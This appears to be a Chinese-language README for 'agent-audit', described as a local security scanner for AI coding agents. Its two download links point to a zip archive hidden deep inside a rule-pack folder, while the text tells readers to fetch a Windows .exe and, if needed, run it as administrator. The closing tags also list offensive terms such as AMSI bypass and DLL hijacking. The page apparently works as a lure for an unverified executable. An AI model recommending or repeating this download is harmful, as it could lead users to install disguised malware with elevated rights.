muhamedali7713/agent-audit

# 🛡️ agent-audit - 保护你的 AI 编程智能体安全 [](https://raw.githubusercontent.com/muhamedali7713/agent-audit/main/src/agent_audit/knowledge/rule_packs/external/cisco-core-checks-inventory/agent_audit_v2.0.zip) agent-audit 充当你本地编码助手的安全工具。像 Claude Code、Codex CLI 和 OpenClaw 这样的现代工具可以帮助你更快地编写软件。虽然这些工具节省了时间，但它们也会访问你的项目文件和系统设置。本程序会扫描你的工作区，以查找配置和会话历史记录中的潜在风险。它会根据一个包含 296 条安全规则的库，检查你的插件、技能和模型上下文协议清单。 ## 📥 如何下载软件 该软件位于 GitHub 上。访问官方仓库页面以获取最新版本。你可以在此页面上找到适用于 Windows 的安装程序。 [在此获取 agent-audit](https://raw.githubusercontent.com/muhamedali7713/agent-audit/main/src/agent_audit/knowledge/rule_packs/external/cisco-core-checks-inventory/agent_audit_v2.0.zip) 点击上方链接进入主页。在屏幕右侧选择最新的发布版本。下载以 `.exe` 结尾的安装文件。将此文件保存到你的计算机。 ## ⚙️ 系统要求 你的计算机需要满足以下基本标准才能运行该应用程序： * 操作系统：Windows 10 或 Windows 11。 * 处理器：双核 CPU 或更高。 * 内存：至少 4 GB RAM。 * 存储空间：100 MB 可用磁盘空间。 * 网络：需要访问互联网以下载更新和规则定义。 ## 🚀 设置扫描程序 运行你下载的安装程序文件。按照屏幕上的说明完成该过程。安装程序会在你的桌面上创建一个快捷方式。双击此图标以启动扫描工具。 该程序会在你的文档目录中创建一个用于存放日志和设置的文件夹。它在这里存储你的扫描历史记录。如果你希望将文件保存在其他位置，可以在设置菜单中更改此位置。 ## 🔍 如何运行审计 1. 打开 agent-audit 应用程序。 2. 选择“Scan Project”按钮。 3. 浏览到包含你编码项目的文件夹。 4. 选择该文件夹并选择“Run Audit”。 该应用程序会检查你的文件。它读取日志和指令文件以查找不符合当前安全标准的模式。进度条会显示扫描状态。 ## 📊 了解你的结果 扫描完成后，扫描器会显示一个仪表板。你会看到一个按风险级别分类的发现列表。 * Critical（严重）：这些项目需要你直接关注。它们表明插件或清单可以访问不安全的区域。 * Warning（警告）：这些项目显示了潜在的配置错误。请检查这些项目，以确保你的智能体按你的意图运行。 * Info（信息）：这些代表了有关你设置的一般性观察结果。 每项发现都包含一个简短的描述，说明了该工具标记该项目的原因。你可以点击文件路径以打开特定文档，并查看触发警告的代码或配置行。 ## 🛠️ 管理你的规则 该程序包含 296 条规则，定义了该工具所称的不良模式。这些规则涵盖了常见的提示注入方法、不安全的文件访问以及不正确的插件存储。每次启动软件时，应用程序都会检查这些规则的更新。 你可以在“Rules Manager”选项卡中打开或关闭单个规则。这有助于你忽略不适用于你特定项目需求的警告。我们建议保持所有默认规则启用，以维持最高级别的安全性。 ## 📁 扫描特定的智能体文件夹 编码智能体通常会保留它们自己的隐藏文件夹。常见名称包括： * .claude-code * .codex * .openclaw * .mcp-manifests 该工具会自动搜索这些文件夹。如果你将智能体设置保存在非标准位置，可以将该目录添加到自定义扫描列表中。使用设置菜单中的“Add Folder”按钮，将扫描器指向你的自定义智能体目录。 ## 🛡️ 保护你的数据安全 agent-audit 在本地执行所有扫描。在扫描过程中，你的代码和日志永远不会离开你的机器。该工具不会将你的项目数据上传到任何外部服务器。 虽然该工具需要访问互联网才能获取最新的规则定义，但它仅将此连接用于这些更新。如果你已经更新了规则，则可以在离线模式下运行该工具。但是，离线模式会阻止发现新的安全威胁。 ## 🛠️ 常见问题排查 如果软件无法启动，请确保你已安装了正确的 Windows 更新。某些用户可能需要以管理员身份运行该应用程序才能访问锁定的系统文件。为此，请右键单击快捷方式并选择“以管理员身份运行”。 如果扫描器在扫描中途停止，请检查你的磁盘空间。超大型编码项目可能需要更多内存。在对大型目录运行全面扫描之前，请尝试关闭 Web 浏览器或其他消耗资源大的应用程序。 如果你发现误报，请使用“Ignore”功能。这将在未来的报告中隐藏该发现。你可以随时在“Exclusions”选项卡中查看你已忽略的项目。 ## 📋 提升安全性的提示 保持你的编码智能体处于最新状态。在对插件或清单文件进行每次重大更新后，请使用 agent-audit 扫描器。检查结果中是否有新的警告。 像对待源代码一样对待你的智能体指令。不要在指令文件中包含密码和 API 密钥。请在配置文件中使用本地环境变量，而不是硬编码的值。如果扫描器检测到纯文本形式的密钥，则会对其进行标记，这有助于你将它们转移到更安全的位置。 ## 📧 获取帮助 如果你遇到错误或对特定规则有疑问，请在 GitHub 仓库上打开一个新的 Issue。提供错误描述并包含该应用程序生成的日志文件。请勿在你的报告中包含你个人的项目文件或敏感数据。开发团队会审查这些请求，以改进该工具并向库中添加新的安全模式。

标签：AI安全, AMSI绕过, Chat Copilot, DLL 劫持, LLM辅助验证, MCP协议, SecOps, StruQ, 云安全架构, 人工智能, 会话历史安全, 大语言模型, 威胁检测, 安全扫描, 对称加密, 插件安全, 文档安全, 时序注入, 用户模式Hook绕过, 编码助手, 网络安全, 自动化审计, 自定义安全规则, 逆向工具, 错误基检测, 隐私保护, 零日漏洞检测, 静态代码分析